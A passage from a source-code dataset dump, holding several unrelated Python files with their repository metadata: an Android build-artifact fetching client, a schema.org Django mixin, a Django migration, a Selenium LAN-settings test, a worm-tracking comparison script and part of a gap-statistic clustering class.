retried_errors=None,
retry_delay_seconds=5,
max_tries=_DEFAULT_RETRIES):
"""Execute http request and return None on specified errors.
Args:
http_request: the apiclient provided http request
masked_errors: list of errors to return None on
retried_errors: list of erros to retry the request on
retry_delay_seconds: how many seconds to sleep before retrying
max_tries: maximum number of attmpts to make request
Returns:
The result on success or None on masked errors.
"""
if not masked_errors:
masked_errors = _DEFAULT_MASKED_ERRORS
if not retried_errors:
retried_errors = _DEFAULT_RETRIED_ERRORS
last_error = None
for _ in range(max_tries):
try:
return http_request.execute()
except http_client.errors.HttpError as e:
last_error = e
if e.resp.status in masked_errors:
return None
elif e.resp.status in retried_errors:
time.sleep(retry_delay_seconds)
else:
# Server Error is server error
raise e
# We've gone through the max_retries, raise the last error
raise last_error # pylint: disable=raising-bad-type
def create_client(http):
"""Creates an Android build api client from an authorized http object.
Args:
http: An authorized httplib2.Http object.
Returns:
An authorized android build api client.
"""
return build(serviceName='androidbuildinternal', version='v2beta1', http=http)
def create_client_from_json_keyfile(json_keyfile_name=None):
"""Creates an Android build api client from a json keyfile.
Args:
json_keyfile_name: The location of the keyfile, if None is provided use
default location.
Returns:
An authorized android build api client.
"""
if not json_keyfile_name:
json_keyfile_name = os.path.join(os.getenv('HOME'), _DEF_JSON_KEYFILE)
credentials = ServiceAccountCredentials.from_json_keyfile_name(
filename=json_keyfile_name, scopes=_SCOPE_URL)
http = httplib2.Http()
credentials.authorize(http)
return create_client(http)
def create_client_from_p12(robot_credentials_file, robot_username):
"""Creates an Android build api client from a config file.
Args:
robot_credentials_file: The path to the robot credentials file.
robot_username: A string containing the username of the robot account.
Returns:
An authorized android build api client.
"""
http = _create_http_from_p12(robot_credentials_file, robot_username)
return create_client(http)
def fetch_artifact(client, build_id, target, resource_id, dest):
"""Fetches an artifact.
Args:
client: An authorized android build api client.
build_id: AB build id
target: the target name to download from
resource_id: the resource id of the artifact
dest: path to store the artifact
"""
out_dir = os.path.dirname(dest)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
dl_req = client.buildartifact().get_media(
buildId=build_id,
target=target,
attemptId='latest',
resourceId=resource_id)
print('Fetching %s to %s...' % (resource_id, dest))
with io.FileIO(dest, mode='wb') as fh:
downloader = apiclient.http.MediaIoBaseDownload(
fh, dl_req, chunksize=_DEFAULT_CHUNK_SIZE)
done = False
while not done:
status, done = downloader.next_chunk(num_retries=_DEFAULT_RETRIES)
print('Fetching...' + str(status.progress() * 100))
print('Done Fetching %s to %s' % (resource_id, dest))
def get_build_list(client, **kwargs):
"""Get a list of builds from the android build api that matches parameters.
Args:
client: An authorized android build api client.
**kwargs: keyworded arguments to pass to build api.
Returns:
Response from build api.
"""
build_request = client.build().list(**kwargs)
return _simple_execute(build_request)
def list_artifacts(client, regex, **kwargs):
"""List artifacts from the android build api that matches parameters.
Args:
client: An authorized android build api client.
regex: Regular expression pattern to match artifact name.
**kwargs: keyworded arguments to pass to buildartifact.list api.
Returns:
List of matching artifact names.
"""
matching_artifacts = []
kwargs.setdefault('attemptId', 'latest')
regex = re.compile(regex)
req = client.buildartifact().list(**kwargs)
while req:
result = _simple_execute(req)
if result and 'artifacts' in result:
for a in result['artifacts']:
if regex.match(a['name']):
matching_artifacts.append(a['name'])
req = client.buildartifact().list_next(req, result)
return matching_artifacts
def fetch_artifacts(client, out_dir, target, pattern, build_id):
"""Fetches target files artifacts matching patterns.
Args:
client: An authorized instance of an android build api client for making
requests.
out_dir: The directory to store the fetched artifacts to.
target: The target name to download from.
pattern: A regex pattern to match to artifacts filename.
build_id: The Android Build id.
"""
if not os.path.exists(out_dir):
os.makedirs(out_dir)
# Build a list of needed artifacts
artifacts = list_artifacts(
client=client,
regex=pattern,
buildId=build_id,
target=target)
for artifact in artifacts:
fetch_artifact(
client=client,
build_id=build_id,
target=target,
resource_id=artifact,
dest=os.path.join(out_dir, artifact))
def get_latest_build_id(client, branch, target):
"""Get the latest build id.
Args:
client: An authorized instance of an android build api client for making
requests.
branch: The branch to download from
target: The target name to download from.
Returns:
The build id.
"""
build_response = get_build_list(
client=client,
branch=branch,
target=target,
maxResults=1,
successful=True,
buildType='submitted')
if not build_response:
raise ValueError('Unable to determine latest build ID!')
return build_response['builds'][0]['buildId']
def fetch_latest_artifacts(client, out_dir, target, pattern, branch):
"""Fetches target files artifacts matching patterns from the latest build.
Args:
client: An authorized instance of an android build api client for making
requests.
out_dir: The directory to store the fetched artifacts to.
target: The target name to download from.
pattern: A regex pattern to match to artifacts filename
branch: The branch to download from
"""
build_id = get_latest_build_id(
client=client, branch=branch, target=target)
fetch_artifacts(client, out_dir, target, pattern, build_id)
| [
"[email protected]"
] | |
15a60453aa5419b4fa377688c031c2632596a4f9 | 7ce479cac0a14d924159db9c784e3325b8f0bce7 | /schemaorgschemas/Thing/MedicalEntity/MedicalProcedure/__init__.py | cbefd8704afe1d477dfc83e65cb81ce50f18686e | [] | no_license | EvelineAndreea/AGRe | 1f0c27237eb047a60bbcfb8d73e3157035406409 | b952125896a82741f6617c259dd4060954583180 | refs/heads/master | 2020-04-08T16:08:11.517166 | 2018-11-28T07:15:56 | 2018-11-28T07:15:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,059 | py | # -*- coding: utf-8 -*-
from schemaorgschemas.Thing import potentialActionProp, nameProp, sameAsProp, imageProp, urlProp, mainEntityOfPageProp, additionalTypeProp, alternateNameProp, descriptionProp
from schemaorgschemas.Thing.MedicalEntity import codeProp, relevantSpecialtyProp, studyProp, guidelineProp, recognizingAuthorityProp, medicineSystemProp
from schemaorgschemas.djangoschema import SchemaObject, SchemaProperty, SchemaEnumProperty, SCHEMA_ORG
from django.conf import settings
class MedicalProcedureSchema(SchemaObject):
"""Schema Mixin for MedicalProcedure
Usage: place after django model in class definition, schema will return the schema.org url for the object
A process of care used in either a diagnostic, therapeutic, or palliative capacity that relies on invasive (surgical), non-invasive, or percutaneous techniques.
"""
def __init__(self):
self.schema = 'MedicalProcedure'
class followupProp(SchemaProperty):
"""
SchemaField for followup
Usage: Include in SchemaObject SchemaFields as your_django_field = followupProp()
schema.org description:Typical or recommended followup care after the procedure is performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'followup'
_expected_schema = None
_enum = False
_format_as = "TextField"
class preparationProp(SchemaProperty):
"""
SchemaField for preparation
Usage: Include in SchemaObject SchemaFields as your_django_field = preparationProp()
schema.org description:Typical preparation that a patient must undergo before having the procedure performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'preparation'
_expected_schema = None
_enum = False
_format_as = "TextField"
class procedureTypeProp(SchemaProperty):
"""
SchemaField for procedureType
Usage: Include in SchemaObject SchemaFields as your_django_field = procedureTypeProp()
schema.org description:The type of procedure, for example Surgical, Noninvasive, or Percutaneous.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
used to reference MedicalProcedureType"""
_prop_schema = 'procedureType'
_expected_schema = 'MedicalProcedureType'
_enum = False
_format_as = "ForeignKey"
class howPerformedProp(SchemaProperty):
"""
SchemaField for howPerformed
Usage: Include in SchemaObject SchemaFields as your_django_field = howPerformedProp()
schema.org description:How the procedure is performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'howPerformed'
_expected_schema = None
_enum = False
_format_as = "TextField"
# schema.org version 2.0
| [
"[email protected]"
] | |
222a8516170dbdfd60052c5217c8dbe791724e6b | a6df74bc7c139734bd9ce9f48d51e08fdc7d7efb | /article/migrations/0016_auto_20210412_1456.py | 34b4c21151d60a7d9f4aa95d47c0410f17c749cc | [] | no_license | Erlan1998/python_group_7_homework_68_Erlan_Kurbanaliev | 5a7f210e51f1998e5d52cdeb42538f2786af3f9f | fdc92be2c5187c78fecdc713f58e0e3e9fc62cb1 | refs/heads/master | 2023-05-03T17:01:59.066596 | 2021-05-26T13:28:41 | 2021-05-26T13:28:41 | 368,165,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | # Generated by Django 3.1.6 on 2021-04-12 14:56
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('article', '0015_auto_20210412_1444'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'permissions': [('сan_have_piece_of_pizza', 'Может съесть кусочек пиццы')], 'verbose_name': 'Статья', 'verbose_name_plural': 'Статьи'},
),
]
| [
"[email protected]"
] | |
3f6f9421f822fd2a774361edb18fd8c12c87027d | b58b175263f275e15a1b56bf1b0914db0f35ffc8 | /testcase/testcase_lan.py | 8d4326cbd823f38fc4d2cbf52a1cb50582dc55ed | [] | no_license | zeewii/BHU | aa9ff900a4bb6adb368081509b9f9222479f7742 | 1f3c4f634b44845f7a4f84535ff4904de4efc634 | refs/heads/master | 2021-01-09T21:49:01.534541 | 2015-09-30T09:21:28 | 2015-09-30T09:21:28 | 43,213,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,828 | py | #coding=utf-8
#描述:该模块为测试lan模块
#作者:曾祥卫
import unittest
from selenium import webdriver
import time,os,commands
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from login import login_control
from data import data
from network.interface import interface_control
from connect import ssh
from publicControl import public_control
from network.interface.lan import lan_business
from network.interface import interface_business
class TestLan(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
#将浏览器最大化
self.driver.maximize_window()
#使用默认ip登录lan页面
lan_business.goin_default_lan(self)
def test_054_055_IP_netmask(self):
u"""修改LAN IP和A,B,C类子网掩码"""
#把4次修改LAN IP和子网掩码后client ping修改后ip的值取出
result = lan_business.step_100msh0054_100msh0055(self)
print result
#如果4次都为0则通过,否则不通过
assert result == [0,0,0,0],u"测试LAN IP和A,B,C类子网掩码失败"
print u"测试LAN IP和A,B,C类子网掩码成功"
def test_056_custom_netmask(self):
u"""lan自定义掩码设置"""
result = lan_business.step_100msh0056(self)
print result
#如果4次都为1则通过,否则不通过
assert result == [1,1,1,1],u"测试lan自定义掩码设置失败"
print u"测试lan自定义掩码设置成功"
def test_057_broadcast(self):
u"""lan广播地址配置有效性测试"""
result = lan_business.step_100msh0057(self)
print result
#如果2次都为1则通过,否则不通过
assert result == [1,1],u"测试lan广播地址配置有效性失败"
print u"测试lan广播地址配置有效性成功"
def test_059_startip(self):
u"""IP地址池默认起始值检查"""
result = lan_business.step_100msh0059(self)
print result
#如果IP地址池默认起始值为100则通过,否则不通过
assert result == '100',u"测试IP地址池默认起始值失败"
print u"测试IP地址池默认起始值成功"
def test_067_068_abnormal_input(self):
u"""lan异常输入测试"""
result = lan_business.step_100msh0067_100msh0068(self)
print result
#如果4次都为1则通过,否则不通过
assert result == [1,1,1,1],u"测试lan异常输入测试失败"
print u"lan测试异常输入测试成功"
#退出清理工作
def tearDown(self):
self.driver.quit()
if __name__=='__main__':
unittest.main()
__author__ = 'zeng'
| [
"[email protected]"
] | |
5a65c3db8f5241c487aab78f930d7ec197529388 | 5a4d5ee624b375ece06fda1467afe18beb69c14b | /Algorithm/SW_Expert/1-46.py | e2fcfc033cbfedd0121723aaeb2c5ba1ecc91913 | [] | no_license | Knightofcydonia51/TIL | cd10dab949659bc827118ee42b25d926336dce23 | 78d7e8617f4abed9932a557c12e68bd950f8230d | refs/heads/master | 2022-12-26T00:10:06.262200 | 2022-05-26T01:12:32 | 2022-05-26T01:12:32 | 195,938,010 | 0 | 0 | null | 2022-12-16T01:03:09 | 2019-07-09T05:22:49 | Python | UTF-8 | Python | false | false | 218 | py | def score(text):
result=list(map(lambda x: 4 if x=='A' else 3 if x=='B' else 2 if x=='C' else 1 ,text))
return sum(result)
print(score('ADCBBBBCABBCBDACBDCAACDDDCAABABDBCBCBDBDBDDABBAAAAAAADADBDBCBDABADCADC')) | [
"[email protected]"
] | |
bd692ef3d3cce53cc175de340df496d1c8586914 | eb518a18d8055400c85d1b2f714fe9d4d654b941 | /compare_segworm/_old/head_tail_manual_switched.py | 6948c7b9e0ebe75f72f883facddf4243954e34e8 | [] | no_license | ver228/single-worm-analysis | c755709354025f629f7c774749394743c7b9a46b | 8d0a442fb93ad25aa30743f6c31f883639524a4d | refs/heads/master | 2021-09-14T11:31:17.761390 | 2018-05-12T23:00:54 | 2018-05-12T23:00:54 | 79,457,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,602 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 11 22:01:59 2016
@author: ajaver
"""
import h5py
import tables
import os
import numpy as np
import matplotlib.pylab as plt
from scipy.io import loadmat
import glob
import os
import pandas as pd
from MWTracker.featuresAnalysis.obtainFeaturesHelper import WormFromTable
from MWTracker.featuresAnalysis.obtainFeatures import getMicronsPerPixel, getFPS
good_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/osm-9 (ky10) on food R_2010_06_15__14_57_24___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-108 (n501)I on food L_2009_12_10__14_02_38___2___9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-103 (e1597)II on food R_2010_08_06__15_41_28___8___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food L_2010_01_12__13_07_15___4___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food L_2010_05_11__14_51_15___7___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-14 (n549)X on food L_2010_07_15__16_20___3___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-6 (ok3056)V on food R_2010_01_14__11_35___3___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gar-2 (ok250)III on food R_2010_07_22__11_23_27___1___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food R_2011_05_24__13_03_48___7___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/vab-7 (e1562)III on food L_2011_10_13__11_49_40___1___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food R_2010_01_12__13_06_48___2___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food R_2010_05_13__15_47___3___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_26__16_25_46___6___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-16 (ok3085) on food L_2010_01_11__12_35_14___7___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flr-1 (ut11) on food L_2010_04_09__15_53_02___1___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food l_2010_05_11__16_50_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-1 (n487)V on food R_2010_07_15__11_47_56___1___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/daf-5 (e1386)II on food L_2010_07_22__14_46_33__8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/rab-3 (cy250) on food L_2011_08_04__11_10_43___2___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-2 (ok1887) on food r_2010_02_19__14_43_43___8___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food R_2010_09_24__12_55___3___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food R_2010_05_13__15_03_22___1___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-16 (e109) on food L_2009_12_11__12_21___3___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-63 (ok1075) on food L_2010_04_16__12_57_13___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-12 (n602)V on food L_2010_07_16__12_05_00___1___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gpa-8 (pk435)V on food L_2010_03_11__10_25_35___8___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-79 (e1068)III on food L_2010_04_13__15_39_23___8___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-46 (n1127)V on food L_2010_08_06__16_02_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-8 (v488) on food R_2011_09_20__13_33_10___7___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_09__15_36_39___1___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-60 (e273)V on food L_2010_04_15__13_07_43__9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/asic-1 (ok415) on food R_2010_06_15__11_26_21___2___3.hdf5'''
partial_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
15401-15415
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_23__12_37_31___8___6.hdf5
19804-19806, 19819-19830, 19886-19893, 19904-19907, 19921-19931, 19938-19938, 19945-19945, 19985-19986, 20055-20055
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food L_2010_08_05__14_44_24___2___11.hdf5
14045-14045, 14173-14184, 14226-14226, 14298-14298, 14333-14334, 14344-14344, 14378-14378
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/trp-1 (sy691) on food R_2010_04_21__14_59_17___8___10.hdf5
12231-12231, 12242-12243, 12250-12273, 12285-12285, 12295-12299, 12306-12306, 12331-12346, 12421-12457, 12464-12469, 12479-12480, 12664-12664, 12677-12701, 12830-12888, 12895-12923, 12930-12931,
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-104 (e1265)III on food R_2011_10_18__15_39___4___10.hdf5
2608-3747, 3755-5270
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-105 (ok1432) on food L_2010_07_06__11_44_23___2___6.hdf5
1812-1819, 1826-1832
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-15 (ok1214)X on food L_2010_02_24__15_45_04___8___14.hdf5
250-411, 419-424, 700-700, 793-799, 808-811, 1012-1018, 1032-1032, 18761-18814
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food R_2010_09_24__11_35___3___2.hdf5
810-810, 18597-18597, 18608-18608, 23978-23982, 23988-23993
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-38 (e264)I on food L_2010_08_19__12_34_15___1___6.hdf5
7480-7582, 7590-7590, 7596-7596, 7603-7607, 7617-7643, 7652-7652, 7663-7722, 7733-7736, 7806-7963
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food L_2010_04_14__11_22_30___8___5.hdf5
12445-12445, 12455-12459, 12475-12316, 12242-13344, 13354-13362, 13368-15598, 18411-18411, 18510-18510
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food R_2010_04_13__11_06_24___4___3.hdf5
3240-3249, 3258-3265, 3286-3294, 3328-3332, 18547-18547, 18585-18589
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_17__16_04_15___1___8.hdf5
20530-20530, 20536-23004 '''
bad_track_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-32 (e189) on food L_2009_12_09__15_57_51___2___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-21 (ok1314)III on food L_2010_02_24__14_45_13__11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-17 (e245) on food R_2010_04_16__14_27_23___2___8.hdf5'''
wrong_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-1 (e1598)X on food R_2010_04_14__11_58_21___2___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_09__12_33_45___8___7.hdf5'''
partial_wrong_files_str ='''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_24__10_24_18__2.hdf5
17709-17735, 17743-17758, 17772-17772, 17782-17788, 17795-17795, 17801-17801'''
good_files = good_files_str.split('\n')
bad_track_files = bad_track_files_str.split('\n')
wrong_files = wrong_files_str.split('\n')
def read_partial_files(f_str):
dd = f_str.split('\n')
index_dict = {}
fnames = []
for ii in range(0, len(dd),2 ):
fname = dd[ii]
indexes_str = dd[ii+1]
indexes = [tuple(map(int, x.split('-'))) for x in indexes_str.split(', ') if x]
index_dict[fname] = indexes
fnames.append(fname)
return fnames, index_dict
partial_files, bad_index_dict = read_partial_files(partial_files_str)
wrong_partial_files, good_index_dict = read_partial_files(partial_wrong_files_str)
files = bad_track_files + partial_files + wrong_partial_files+ wrong_files + good_files
all_dat = []
for mask_id, masked_image_file in enumerate(files):
dd = masked_image_file[:-5]
segworm_feat_file = dd + '_features.mat'
skeletons_file = dd + '_skeletons.hdf5'
features_file = dd + '_features.hdf5'
if not os.path.exists(features_file):
continue
print(mask_id, masked_image_file)
#read data from the new sekeltons
skeletons = np.zeros(0) #just to be sure i am not using a skeleton for another file
with tables.File(features_file, 'r') as fid:
#if '/features_means' in fid and \
#fid.get_node('/features_means').attrs['has_finished'] and \
#fid.get_node('/features_timeseries').shape[0]>0:
skeletons = fid.get_node('/skeletons')[:]
if skeletons.size > 0:
frame_range = fid.get_node('/features_events/worm_1')._v_attrs['frame_range']
#pad the beginign with np.nan to have the same reference as segworm (time 0)
skeletons = np.pad(skeletons, [(frame_range[0],0), (0,0), (0,0)],
'constant', constant_values=np.nan)
#else:
# continue
with tables.File(skeletons_file, 'r') as fid:
timestamp_raw = fid.get_node('/timestamp/raw')[:].astype(np.int)
#read data from the old skeletons
fvars = loadmat(segworm_feat_file, struct_as_record=False, squeeze_me=True)
micronsPerPixels_x = fvars['info'].video.resolution.micronsPerPixels.x
micronsPerPixels_y = fvars['info'].video.resolution.micronsPerPixels.y
segworm_x = -fvars['worm'].posture.skeleton.x.T
segworm_y = -fvars['worm'].posture.skeleton.y.T
segworm = np.stack((segworm_x,segworm_y), axis=2)
#get the total number of skeletons
tot_skel = np.sum(~np.isnan(skeletons[:,0,0]))
tot_seg = np.sum(~np.isnan(segworm[:,0,0]))
#correct in case the data has different size shape
max_n_skel = min(segworm.shape[0], skeletons.shape[0])
skeletons = skeletons[:max_n_skel]
segworm = segworm[:max_n_skel]
#shift the skeletons coordinate system to one that diminushes the errors the most.
seg_shift = np.nanmedian(skeletons-segworm, axis = (0,1))
segworm += seg_shift
#print('S', seg_shift)
#%%
R_ori = np.sum(np.sqrt(np.sum((skeletons-segworm)**2, axis=2)), axis=1)
R_inv = np.sum(np.sqrt(np.sum((skeletons[:,::-1,:]-segworm)**2, axis=2)), axis=1)
bad_ind = np.isnan(R_ori)
ht_mismatch = np.argmin((R_ori, R_inv), axis =0)
ht_mismatch[bad_ind] = 0
#%%
bad_vec = np.zeros(skeletons.shape[0], np.bool)
if masked_image_file in bad_index_dict:
bad_indexes = bad_index_dict[masked_image_file]
for bad_index in bad_indexes:
bad_timestamp = timestamp_raw[bad_index[0]:bad_index[1]+1]
bad_vec[bad_timestamp] = True
#make false the once without skeletons to avoid double counting
bad_vec[np.isnan(skeletons[:,0,0])] = False
elif masked_image_file in good_index_dict:
good_indexes = good_index_dict[masked_image_file]
bad_vec = ~np.isnan(skeletons[:,0,0])
for good_index in good_indexes:
good_timestamp = timestamp_raw[good_index[0]:good_index[1]+1]
bad_vec[good_timestamp] = False
elif masked_image_file in wrong_files:
bad_vec = ~np.isnan(skeletons[:,0,0])
else:
tot_bad_skel = 0
tot_bad_skel = sum(bad_vec)
good_ind = ~bad_ind
tot_common = np.sum(good_ind)
#%%
new1old0 = np.sum(ht_mismatch & ~bad_vec & good_ind)
new0old1 = np.sum(ht_mismatch & bad_vec & good_ind)
new1old1 = np.sum(~ht_mismatch & ~bad_vec & good_ind)
new0old0 = np.sum(~ht_mismatch & bad_vec & good_ind)
#%%
all_dat.append((tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0))
#%%
if False:
w_xlim = w_ylim = (-10, skeletons.shape[0]+10)
plt.figure()
plt.subplot(2,1,1)
plt.plot(skeletons[:,1,1], 'b')
plt.plot(segworm[:,1,1], 'r')
plt.xlim(w_ylim)
plt.ylabel('Y coord')
plt.subplot(2,1,2)
plt.plot(skeletons[:,1,0], 'b')
plt.plot(segworm[:,1,0], 'r')
plt.xlim(w_xlim)
plt.ylabel('X coord')
plt.xlabel('Frame Number')
#%%
tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0 = zip(*all_dat)
only_seg = tuple(x-y for x,y in zip(tot_seg, tot_common))
only_skel = tuple(x-y for x,y in zip(tot_skel, tot_common))
#%%
#%%
tot_skels = sum(tot_skel)
tot_segs = sum(tot_seg)
tot_commons = sum(tot_common)
tot_union = tot_skels + tot_segs - tot_commons
frac_only_seg = (tot_skels - tot_commons) / tot_union
frac_only_skel = (tot_segs - tot_commons) / tot_union
frac_mutual = tot_commons / tot_union
#%%
frac_skel_bad = sum(tot_bad_skel)/tot_skels
#%%
skel_bad_common =1-(sum(new1old0) + sum(new1old1))/tot_commons
seg_bad_common = 1-(sum(new0old1) + sum(new1old1))/tot_commons
#%%
main_dir = '/Users/ajaver/Desktop/Videos/single_worm/switched_sample/'
all_files = [os.path.join(main_dir, x) for x in os.listdir(main_dir) if not '_features' in x and not '_skeletons' in x and not x.startswith('.')]
print([x for x in all_files if x not in files])
#%%
bad_old = [(x+y)/z for x,y,z in zip(new1old0, new0old0, tot_common)]
bad_new = [(x+y)/z for x,y,z in zip(new0old1, new0old0, tot_common)]
plt.figure()
plt.plot(bad_old, 'sr')
plt.plot(bad_new, 'og')
| [
"[email protected]"
] | |
c2a6c7801f3547946b38492ef118dd975aae1772 | e6c17803c9f60dbeafa7e866d7e108a3239d799d | /what_the_cluster/GapStat.py | 1f928a08083bccde57f61c9a8b280bc201d89c3b | [] | no_license | idc9/what_the_cluster | e6cf04730e224625a0bce21f7a9730a4984d54bd | 50f024e214cf6f4f4f976ac104d50a0c9a7a6d94 | refs/heads/master | 2020-03-11T17:46:27.297370 | 2018-09-19T21:53:59 | 2018-09-19T21:53:59 | 130,156,780 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,107 | py | from math import sqrt
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from scipy.sparse import issparse
from what_the_cluster.gapstat_utils import get_pooled_wcss, estimate_n_clusters
from what_the_cluster.reference_dists import sample_svd_null, sample_uniform_null
from what_the_cluster.utils import _is_strictly_increasing, _count_none, svd_wrapper
from what_the_cluster.clusterers import get_clusterer
# TODO: implement seeds
# TODO: give clusterer the option to return additional data
# TODO: give user the ability to input pre-sampled reference distributions
class GapStat(object):
def __init__(self,
clusterer='kmeans',
clusterer_kwargs={},
cluster_sizes=list(range(1, 11)),
ref_dist='uniform',
B=10,
gap_est_method='Tibs2001SEmax'):
"""
For details see Estimating the Number of Clusters in a Data Set via
the Gap Statistic by R. Tibshirani, G. Walther and T. Hastie, 2001.
Parameters
----------
clusterer (str, function): a function which computes clusters.
If clusterer is a string, the will used one of the pre-implemented
clustering algorithms from clusterers.py. Available options include
['kmeans']
If clusterer is a function then it should accpet two argumets:
(X, n_clusters) where X is the data set to cluster and n_clusters
is the number of desired clusters to estimate. This function should
return a list of estimated clusters for each observation.
clusterer_kwargs (None, dict): dict of key word arguments for the
clusterer function. See the documentation for the orignal functions
for available arguments (linked to in clusterers.py)
Warning: these are only applied for the
pre-implemented clusterers i.e. if clusterer is a string.
cluster_sizes (list): list of n_clusters to evaluate. Must be
strictly increasing.
ref_dist (str): which null reference distribution to use. Either
['uniform', 'svd']. 'uniform' will draw uniform smaples
from a box which has the same range of the data. 'PCA' will
use the prinicpal components to better adapt the shape of
the reference distribution to the observed data set.
See (Tibshirani et al, 2001) for details.
B (int): number of samples of null reference set to draw to estimated
the E log(W)
gap_est_method (str): how to select the local max using the gap
statistic. Currently one of ['firstmax', 'globalmax',
'Tibs2001SEmax']. See estimate_n_clusters() for details.
"""
assert ref_dist in ['uniform', 'svd']
assert _is_strictly_increasing(cluster_sizes)
self.ref_dist = ref_dist
self.B = B
self.cluster_sizes = cluster_sizes
self.gap_est_method = gap_est_method
if callable(clusterer):
# there might be an issue with python 3.x for x <2
# see https://stackoverflow.com/questions/624926/how-do-i-detect-whether-a-python-variable-is-a-function
self.clusterer_name = 'custom'
self.clusterer = clusterer
if clusterer_kwargs is not None:
# TODO: make this a proper Warning
print("WARNING: clusterer_kwargs is only use for pre-implemented clusterers")
else:
self.clusterer_name = clusterer
if clusterer == 'custom':
# this means we are loading a saved version of this object
# and we didn't save the clusterer funciton which should be
# saved separately
self.clusterer = None
else:
self.clusterer = get_clusterer(clusterer, clusterer_kwargs)
# only store this in case we save this object to disk
self.clusterer_kwargs = clusterer_kwargs
# these attributes will be set later
# self.X = None # observed data
# self.U = None # U, D, V are SVD of X
# self.D = None
# self.V = None
# self.obs_cluster_labels = None
# self.obs_wcss = None
# self.null_wcss_samples = None
# self.est_n_clusters = None
# self.possible_n_clusters = None
# self.metadata = {}
def get_params(self):
return {'clusterer': self.clusterer,
'clusterer_kwargs': self.clusterer_kwargs,
